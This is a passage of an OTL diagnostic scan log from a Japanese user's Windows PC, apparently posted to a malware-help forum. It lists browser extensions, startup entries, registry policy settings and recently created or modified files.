FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 37.0.1\extensions\\Plugins: c:\program files (x86)\Mozilla Firefox\plugins

[2014/05/16 21:28:33 | 000,000,000 | ---D | M] (No name found) -- C:\Users\ryota\AppData\Roaming\mozilla\Extensions
[2015/04/04 19:27:38 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions
[2015/04/04 19:25:26 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}

[color=#E56717]========== Chrome ==========[/color]

CHR - default_search_provider: Google (Enabled)
CHR - default_search_provider: search_url = {google:baseURL}search?q={searchTerms}&{google:RLZ}{google:originalQueryForSuggestion}{google:assistedQueryStats}{google:searchFieldtrialParameter}{google:bookmarkBarPinned}{google:searchClient}{google:sourceId}{google:instantExtendedEnabledParameter}{google:omniboxStartMarginParameter}ie={inputEncoding}
CHR - default_search_provider: suggest_url = {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client={google:suggestClient}&gs_ri={google:suggestRid}&xssi=t&q={searchTerms}&{google:cursorPosition}{google:currentPageUrl}{google:pageClassification}sugkey={google:suggestAPIKeyParameter},
CHR - homepage:
CHR - plugin: Error reading preferences file
CHR - Extension: Google 繝峨く繝･繝｡繝ｳ繝・ = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\
CHR - Extension: Google 繝峨Λ繧､繝・ = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.4_0\
CHR - Extension: YouTube = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.7_0\
CHR - Extension: Google Search = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.30_0\
CHR - Extension: Twitch Stream = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\fjaicoojlfoococemdcaollmhaiolole\207\
CHR - Extension: Avira Browser Safety = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\flliilndjeohchalpbbcdekjklbdgfkk\1.4.6_0\
CHR - Extension: Dropmark sidebar = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\foiapgoppijipmmgkaibacckkhbngfhp\171\
CHR - Extension: BlocKUTubEADi = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\geoafhlnmffijlblgohnpmjfbnpcpadd\3.2_0\
CHR - Extension: Google 繧ｦ繧ｩ繝ｬ繝・ヨ = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\
CHR - Extension: Gmail = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\

リフレッシュ後OTLログ２


O1 HOSTS File: ([2013/08/22 22:25:41 | 000,000,824 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O2:[b]64bit:[/b] - BHO: (Skype Click to Call for Internet Explorer) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\SkypeIEPlugin.dll (Microsoft Corporation)
O2 - BHO: (Skype Click to Call for Internet Explorer) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O3 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\..\Toolbar\WebBrowser: (no name) - {AEF44653-C059-42CB-A5B7-41C640DA4A67} - No CLSID value found.
O4:[b]64bit:[/b] - HKLM..\Run: [Creative SB Monitoring Utility] C:\WINDOWS\SysNative\SBAVMon.dll (Creative Technology Ltd.)
O4:[b]64bit:[/b] - HKLM..\Run: [IgfxTray] C:\Windows\SysNative\igfxTray.exe (Intel Corporation)
O4 - HKLM..\Run: [APSDaemon] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.)
O4 - HKLM..\Run: [au_WiFi_Connect] C:\Program Files (x86)\au Wi-Fi接続ツール\au_WiFi_Connect.exe ()
O4 - HKLM..\Run: [DivXUpdate] C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe ()
O4 - HKLM..\Run: [eochk] File not found
O4 - HKLM..\Run: [Google Japanese Input Prelauncher] C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaBroker32.exe (Google Inc.)
O4 - HKLM..\Run: [HDAudDeck] C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDeck.exe (VIA)
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\Run: [ApplicationManager] C:\Users\ryota\AppData\Roaming\ApplicationManager\bin\ApplicationManager.exe (Kingsoft Corp. Ltd.)
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\Run: [CCleaner Monitoring] C:\Program Files\CCleaner\CCleaner64.exe (Piriform Ltd)
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\Run: [DAEMON Tools Lite] C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe (Disc Soft Ltd)
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\Run: [iFunBox Fast App Install Handler] C:\Program Files (x86)\i-Funbox DevTeam\iFunBox.exe (i-Funbox.com)
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\Run: [Line] C:\Program Files (x86)\Naver\LINE\Line.exe (LINE Corporation)
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\Run: [OneDrive] C:\Users\ryota\AppData\Local\Microsoft\OneDrive\OneDrive.exe (Microsoft Corporation)
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\RunOnce: [Application Restart #0] C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.)
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableCursorSuppression = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: PromptOnSecureDesktop = 0
O9:[b]64bit:[/b] - Extra Button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\SkypeIEPlugin.dll (Microsoft Corporation)
O9 - Extra Button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O13[b]64bit:[/b] - gopher Prefix: missing
O13 - gopher Prefix: missing
O16 - DPF: {1DC420F0-D89A-40D0-B5CC-92B9AD19A1AC} http://down.hangame.co.jp/jp/dist/hgstart/HGPluginJP28.cab (HGPluginJP28 Class)
O16 - DPF: {255A2E53-D2E3-42DA-9C1D-36B289B8E18B} http://dl.app-netgame.dmm.com/launcher/DMMLauncherAx_32.cab (DMMLauncherAx Control)
O16 - DPF: {5082D9B5-5538-4C50-BDB1-C5F44BFB98CC} http://down.hangame.co.jp/jp/installer/HgRunPub.cab (HgRunPub Class)
O16 - DPF: {AA07EBD2-EBDD-4BD6-9F8F-114BD513492C} http://dist.cdnetworks.co.jp/cdndist/neffy/NeffyLauncher.cab (NeffyLauncherCtl Class)
O16 - DPF: {D4B68B83-8710-488B-A692-D74B50BA558E} http://ccfiles.creative.com/Web/softwareupdate/ocx/15113/CTPIDPDE.cab (Creative Software AutoUpdate Support Package 2)
O16 - DPF: {E705A591-DA3C-4228-B0D5-A356DBA42FBF} http://ccfiles.creative.com/Web/softwareupdate/su2/ocx/20015/CTSUEng.cab (Creative Software AutoUpdate 2)
O16 - DPF: {F6ACF75C-C32C-447B-9BEF-46B766368D29} http://ccfiles.creative.com/Web/softwareupdate/ocx/121022/CTPID.cab (Creative Software AutoUpdate Support Package)
O16 - DPF: {F8160836-0C11-4CA4-AD87-944542C7BCBD} http://down.hangame.co.jp/jp/purple/launcher/PubPlugin.cab (PubPlugin Class)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{0693221B-E6F5-43F7-953D-6A2229EB2054}: NameServer = 60.56.0.135 218.251.89.134
O18:[b]64bit:[/b] - Protocol\Handler\skype4com - No CLSID value found
O18:[b]64bit:[/b] - Protocol\Handler\skypec2c {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\SkypeIEPlugin.dll (Microsoft Corporation)
O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
O18 - Protocol\Handler\skypec2c {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O20:[b]64bit:[/b] - HKLM Winlogon: Shell - (explorer.exe) - C:\WINDOWS\explorer.exe (Microsoft Corporation)
O20:[b]64bit:[/b] - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\WINDOWS\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\WINDOWS\SysWow64\userinit.exe (Microsoft Corporation)
O21:[b]64bit:[/b] - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O30 - LSA: Security Packages - (livessp) - File not found
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2003/04/04 12:00:00 | 000,000,058 | R--- | M] () - F:\autorun.inf -- [ CDFS ]
O33 - MountPoints2\{2284b339-6b2b-11e4-824f-fed426b625ef}\Shell - "" = AutoRun
O33 - MountPoints2\{2284b339-6b2b-11e4-824f-fed426b625ef}\Shell\AutoRun\command - "" = F:\install.exe -- [2003/04/04 12:00:00 | 000,131,072 | R--- | M] ()
O34 - HKLM BootExecute: (autocheck autochk *)
O35:[b]64bit:[/b] - HKLM\..comfile [open] -- "%1" %*
O35:[b]64bit:[/b] - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:[b]64bit:[/b] - HKLM\...com [@ = comfile] -- "%1" %*
O37:[b]64bit:[/b] - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)

CREATERESTOREPOINT
Restore point Set: OTL Restore Point

[color=#E56717]========== Files/Folders - Created Within 30 Days ==========[/color]

[2015/04/21 20:06:50 | 000,000,000 | ---D | C] -- C:\Users\ryota\Desktop\Old Firefox Data
[2015/04/20 21:58:27 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\herdProtect
[2015/04/20 21:58:26 | 000,000,000 | ---D | C] -- C:\Program Files\Reason
[2015/04/20 21:57:24 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\ryota\Desktop\OTL.exe
[2015/04/20 21:53:24 | 002,873,112 | ---- | C] (Reason Company Software Inc.) -- C:\Users\ryota\Desktop\herdProtectScan_Setup.exe
[2015/04/18 19:28:00 | 000,792,056 | ---- | C] (Adobe Systems Incorporated) -- C:\WINDOWS\SysWow64\FlashPlayerApp.exe
[2015/04/18 19:28:00 | 000,178,168 | ---- | C] (Adobe Systems Incorporated) -- C:\WINDOWS\SysWow64\FlashPlayerCPLApp.cpl
[2015/04/18 19:22:07 | 000,000,000 | ---D | C] -- C:\WINDOWS\SysNative\appraiser
[2015/04/16 05:26:09 | 000,085,504 | ---- | C] (Radius Inc.) -- C:\WINDOWS\SysWow64\iccvid.dll
[2015/04/15 04:37:56 | 007,476,032 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ntoskrnl.exe
[2015/04/15 04:37:56 | 001,733,952 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ntdll.dll
[2015/04/15 04:37:55 | 000,950,784 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\tdh.dll
[2015/04/15 04:37:55 | 000,749,568 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\tdh.dll
[2015/04/15 04:37:55 | 000,411,648 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\tracerpt.exe
[2015/04/15 04:37:55 | 000,369,152 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\tracerpt.exe
[2015/04/15 04:37:55 | 000,360,480 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\sechost.dll
[2015/04/15 04:37:55 | 000,285,184 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wow64.dll
[2015/04/15 04:37:55 | 000,246,272 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\microsoft-windows-system-events.dll
[2015/04/15 04:37:55 | 000,013,312 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wow64cpu.dll
[2015/04/15 04:37:48 | 001,385,256 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\msctf.dll
[2015/04/15 04:37:47 | 000,780,800 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\lsm.dll
[2015/04/15 04:37:42 | 006,025,216 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\jscript9.dll
[2015/04/15 04:37:41 | 000,720,384 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ie4uinit.exe
[2015/04/15 04:37:40 | 000,092,160 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\mshtmled.dll
[2015/04/15 04:37:39 | 000,816,128 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\jscript.dll
[2015/04/15 04:37:39 | 000,801,280 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\msfeeds.dll
[2015/04/15 04:37:39 | 000,664,064 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\jscript.dll
[2015/04/15 04:37:39 | 000,584,192 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\vbscript.dll
[2015/04/15 04:37:38 | 000,800,768 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ieapfltr.dll
[2015/04/15 04:37:38 | 000,710,144 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\ieapfltr.dll
[2015/04/15 04:36:49 | 002,373,632 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wucltux.dll
[2015/04/15 04:36:49 | 000,133,256 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wuauclt.exe
[2015/04/15 04:36:48 | 000,891,392 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wuapi.dll
[2015/04/15 04:36:48 | 000,721,920 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\wuapi.dll
[2015/04/15 04:36:48 | 000,408,064 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\WUSettingsProvider.dll
[2015/04/15 04:36:48 | 000,267,264 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\WinSetupUI.dll
[2015/04/15 04:36:48 | 000,200,192 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\storewuauth.dll
[2015/04/15 04:36:48 | 000,066,048 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wups.dll
[2015/04/15 04:36:48 | 000,052,224 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wups2.dll
[2015/04/15 04:36:48 | 000,015,360 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wu.upgrade.ps.dll
[2015/04/15 04:36:47 | 000,140,288 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wuwebv.dll
[2015/04/15 04:36:47 | 000,124,928 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\wuwebv.dll
[2015/04/15 04:36:47 | 000,095,744 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wudriver.dll
[2015/04/15 04:36:47 | 000,081,920 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\wudriver.dll
[2015/04/15 04:36:47 | 000,035,840 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wuapp.exe
[2015/04/15 04:36:47 | 000,029,696 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\wuapp.exe
[2015/04/15 04:36:47 | 000,027,136 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\wups.dll
[2015/04/15 04:36:31 | 000,377,152 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\drivers\clfs.sys
[2015/04/15 04:36:31 | 000,075,264 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\clfsw32.dll
[2015/04/15 04:36:31 | 000,058,880 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\clfsw32.dll
[2015/04/15 04:36:29 | 001,111,552 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\aeinv.dll
[2015/04/15 04:36:29 | 000,957,440 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\appraiser.dll
[2015/04/15 04:36:29 | 000,769,024 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\invagent.dll
[2015/04/15 04:36:29 | 000,726,528 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\generaltel.dll
[2015/04/15 04:36:29 | 000,419,328 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\devinv.dll
[2015/04/15 04:36:29 | 000,227,328 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\aepdu.dll
[2015/04/15 04:36:29 | 000,192,000 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\aepic.dll
[2015/04/15 04:36:29 | 000,030,720 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\acmigration.dll
[2015/04/12 01:37:12 | 000,000,000 | ---D | C] -- C:\Users\ryota\AppData\Local\Apple Computer
[2015/04/10 17:53:01 | 000,000,000 | ---D | C] -- C:\Users\ryota\AppData\Local\Apple
[2015/04/04 21:24:54 | 000,000,000 | ---D | C] -- C:\Users\ryota\AppData\Roaming\Malwarebytes
[2015/04/04 21:24:37 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes' Anti-Malware
[2015/04/04 21:24:37 | 000,000,000 | ---D | C] -- C:\ProgramData\Malwarebytes
[2015/04/04 21:24:36 | 000,025,928 | ---- | C] (Malwarebytes Corporation) -- C:\WINDOWS\SysNative\drivers\mbam.sys
[2015/04/04 21:24:36 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Malwarebytes' Anti-Malware
[2015/04/04 21:21:57 | 010,285,040 | ---- | C] (Malwarebytes Corporation ) -- C:\Users\ryota\Desktop\mbam-setup-1.75.0.1300.exe
[2015/04/04 19:35:46 | 000,000,000 | ---D | C] -- C:\Users\ryota\AppData\Local\Adobe
[2015/04/04 19:27:38 | 000,000,000 | ---D | C] -- C:\Users\ryota\Tracing
[2015/04/04 18:34:25 | 000,000,000 | --SD | C] -- C:\WINDOWS\SysWow64\GWX
[2015/04/04 18:34:25 | 000,000,000 | --SD | C] -- C:\WINDOWS\SysNative\GWX
[2015/04/04 18:11:11 | 000,000,000 | ---D | C] -- C:\Users\ryota\Desktop\Mario Story (J) [!]
[2015/04/04 18:08:59 | 000,000,000 | ---D | C] -- C:\Users\ryota\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\JWord(日本語キーワード)
[2015/04/04 17:31:07 | 000,000,000 | ---D | C] -- C:\Users\ryota\AppData\Roaming\Geek Uninstaller
[2015/04/04 16:36:25 | 000,000,000 | ---D | C] -- C:\Users\ryota\Desktop\geek
[2015/04/04 16:33:36 | 000,050,688 | ---- | C] (Atribune.org) -- C:\Users\ryota\Desktop\ATF-Cleaner (1).exe
[2015/02/02 23:25:12 | 000,782,480 | ---- | C] (Neople inc) -- C:\Users\ryota\AppData\Local\AradIns.exe
[2015/02/02 23:24:38 | 000,584,336 | ---- | C] (Neople inc) -- C:\Users\ryota\AppData\Local\NeopleCustomURLStarter.exe
[4 C:\WINDOWS\SysWow64\*.tmp files -> C:\WINDOWS\SysWow64\*.tmp -> ]
[1 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]

[color=#E56717]========== Files - Modified Within 30 Days ==========[/color]

[2015/04/21 19:59:00 | 000,000,706 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineUA.job
[2015/04/21 19:48:00 | 000,000,626 | ---- | M] () -- C:\WINDOWS\tasks\Adobe Flash Player Updater.job
[2015/04/21 08:59:00 | 000,000,702 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineCore.job
[2015/04/21 02:02:31 | 000,002,196 | ---- | M] () -- C:\Users\Public\Desktop\Google Chrome.lnk
[2015/04/21 02:02:13 | 000,067,584 | --S- | M] () -- C:\WINDOWS\bootstat.dat
[2015/04/21 02:00:06 | 268,435,456 | -HS- | M] () -- C:\swapfile.sys
[2015/04/21 02:00:00 | 2474,680,319 | -HS- | M] () -- C:\hiberfil.sys
[2015/04/20 22:35:30 | 000,000,020 | ---- | M] () -- C:\Users\ryota\AppData\Roaming\appdataFr3.bin
[2015/04/20 21:58:27 | 000,001,140 | ---- | M] () -- C:\Users\Public\Desktop\herdProtect.lnk
[2015/04/20 21:57:26 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\ryota\Desktop\OTL.exe
[2015/04/20 21:54:14 | 002,873,112 | ---- | M] (Reason Company Software Inc.) -- C:\Users\ryota\Desktop\herdProtectScan_Setup.exe
[2015/04/18 19:31:33 | 001,496,524 | ---- | M] () -- C:\WINDOWS\SysNative\PerfStringBackup.INI
[2015/04/18 19:31:33 | 000,722,278 | ---- | M] () -- C:\WINDOWS\SysNative\perfh009.dat
[2015/04/18 19:31:33 | 000,499,650 | ---- | M] () -- C:\WINDOWS\SysNative\perfh011.dat
[2015/04/18 19:31:33 | 000,135,458 | ---- | M] () -- C:\WINDOWS\SysNative\perfc011.dat
[2015/04/18 19:31:33 | 000,135,394 | ---- | M] () -- C:\WINDOWS\SysNative\perfc009.dat
[2015/04/16 05:31:51 | 000,215,552 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\msclmd.dll
[2015/04/16 05:31:51 | 000,195,072 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\msclmd.dll
[2015/04/14 08:24:21 | 000,792,056 | ---- | M] (Adobe Systems Incorporated) -- C:\WINDOWS\SysWow64\FlashPlayerApp.exe
[2015/04/14 08:24:21 | 000,178,168 | ---- | M] (Adobe Systems Incorporated) -- C:\WINDOWS\SysWow64\FlashPlayerCPLApp.cpl
[2015/04/04 21:39:57 | 000,001,132 | ---- | M] () -- C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
[2015/04/04 21:23:16 | 010,285,040 | ---- | M] (Malwarebytes Corporation ) -- C:\Users\ryota\Desktop\mbam-setup-1.75.0.1300.exe
[2015/04/04 19:51:47 | 000,001,098 | ---- | M] () -- C:\Users\ryota\Application Data\Microsoft\Internet Explorer\Quick Launch\WorldofTanks.lnk
[2015/04/04 19:43:00 | 000,000,310 | ---- | M] () -- C:\WINDOWS\tasks\Price Meter Updater.job
[2015/04/04 19:25:29 | 000,001,170 | ---- | M] () -- C:\Users\Public\Desktop\Mozilla Firefox.lnk
[2015/04/04 16:38:09 | 000,000,841 | ---- | M] () -- C:\Users\Public\Desktop\CCleaner.lnk
[2015/04/04 16:33:39 | 000,050,688 | ---- | M] (Atribune.org) -- C:\Users\ryota\Desktop\ATF-Cleaner (1).exe
[2015/03/24 06:59:25 | 001,733,952 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ntdll.dll
[2015/03/24 06:59:25 | 000,360,480 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\sechost.dll
[2015/03/24 06:59:00 | 007,476,032 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ntoskrnl.exe
[2015/03/23 07:45:41 | 000,227,328 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\aepdu.dll
[2015/03/23 07:09:23 | 000,726,528 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\generaltel.dll
[2015/03/23 07:09:22 | 001,111,552 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\aeinv.dll
[2015/03/23 07:09:22 | 000,957,440 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\appraiser.dll
[2015/03/23 07:09:22 | 000,769,024 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\invagent.dll
[2015/03/23 07:09:22 | 000,419,328 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\devinv.dll
[2015/03/23 07:09:22 | 000,030,720 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\acmigration.dll
[4 C:\WINDOWS\SysWow64\*.tmp files -> C:\WINDOWS\SysWow64\*.tmp -> ]
[1 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]

[color=#E56717]========== Files Created - No Company Name ==========[/color]

[2015/04/20 21:58:27 | 000,001,140 | ---- | C] () -- C:\Users\Public\Desktop\herdProtect.lnk
[2015/04/15 04:37:38 | 000,016,303 | ---- | C] () -- C:\WINDOWS\SysWow64\ieuinit.inf
[2015/04/15 04:37:38 | 000,016,303 | ---- | C] () -- C:\WINDOWS\SysNative\ieuinit.inf
[2015/04/04 21:24:37 | 000,001,132 | ---- | C] () -- C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
[2015/03/15 00:01:07 | 000,107,008 | ---- | C] () -- C:\WINDOWS\SysWow64\OEMLicense.dll
[2015/03/14 23:59:54 | 000,046,080 | ---- | C] () -- C:\WINDOWS\SysWow64\BWContextHandler.dll
[2015/03/02 14:09:57 | 000,000,020 | ---- | C] () -- C:\Users\ryota\AppData\Roaming\appdataFr3.bin
[2014/11/19 17:11:37 | 000,000,242 | RHS- | C] () -- C:\ProgramData\ntuser.pol
[2014/10/01 19:54:10 | 000,183,808 | ---- | C] () -- C:\WINDOWS\SysWow64\igdde32.dll
[2014/10/01 19:54:10 | 000,143,360 | ---- | C] () -- C:\WINDOWS\SysWow64\igdail32.dll
[2014/09/24 15:58:21 | 000,002,255 | ---- | C] () -- C:\WINDOWS\SysWow64\WimBootCompress.ini
[2014/02/15 00:25:26 | 000,645,632 | ---- | C] () -- C:\WINDOWS\SysWow64\xvidcore.dll
[2014/02/15 00:25:26 | 000,240,640 | ---- | C] () -- C:\WINDOWS\SysWow64\xvidvfw.dll
[2014/02/15 00:25:25 | 000,079,360 | ---- | C] () -- C:\WINDOWS\SysWow64\ff_vfw.dll
[2014/02/15 00:25:17 | 000,178,688 | ---- | C] () -- C:\WINDOWS\SysWow64\unrar.dll
[2014/02/15 00:25:15 | 000,715,038 | ---- | C] () -- C:\WINDOWS\unins000.exe
[2014/02/15 00:25:15 | 000,216,064 | ---- | C] ( ) -- C:\WINDOWS\SysWow64\lagarith.dll
[2014/02/15 00:25:15 | 000,001,990 | ---- | C] () -- C:\WINDOWS\unins000.dat
[2013/10/28 17:28:07 | 000,188,416 | ---- | C] () -- C:\WINDOWS\SysWow64\utv_core.dll
[2013/10/28 17:28:07 | 000,069,632 | ---- | C] () -- C:\WINDOWS\SysWow64\utv_vcm.dll
[2013/09/15 16:04:47 | 000,000,189 | ---- | C] () -- C:\Users\ryota\AppData\Roaming\WB.CFG
[2013/08/23 00:36:43 | 000,215,943 | ---- | C] () -- C:\WINDOWS\SysWow64\dssec.dat
[2013/08/23 00:36:42 | 000,000,741 | ---- | C] () -- C:\WINDOWS\SysWow64\NOISE.DAT
[2013/08/22 23:46:23 | 000,067,584 | --S- | C] () -- C:\WINDOWS\bootstat.dat
[2013/08/22 16:01:23 | 000,043,131 | ---- | C] () -- C:\WINDOWS\mib.bin
[2013/08/22 08:55:20 | 000,364,544 | ---- | C] () -- C:\WINDOWS\SysWow64\msjetoledb40.dll
[2013/08/22 08:52:39 | 000,673,088 | ---- | C] () -- C:\WINDOWS\SysWow64\mlang.dat
[2012/12/18 00:56:03 | 001,161,682 | ---- | C] () -- C:\Users\ryota\記録されたゲーム - 17-12-2012 10`00`02.mgx
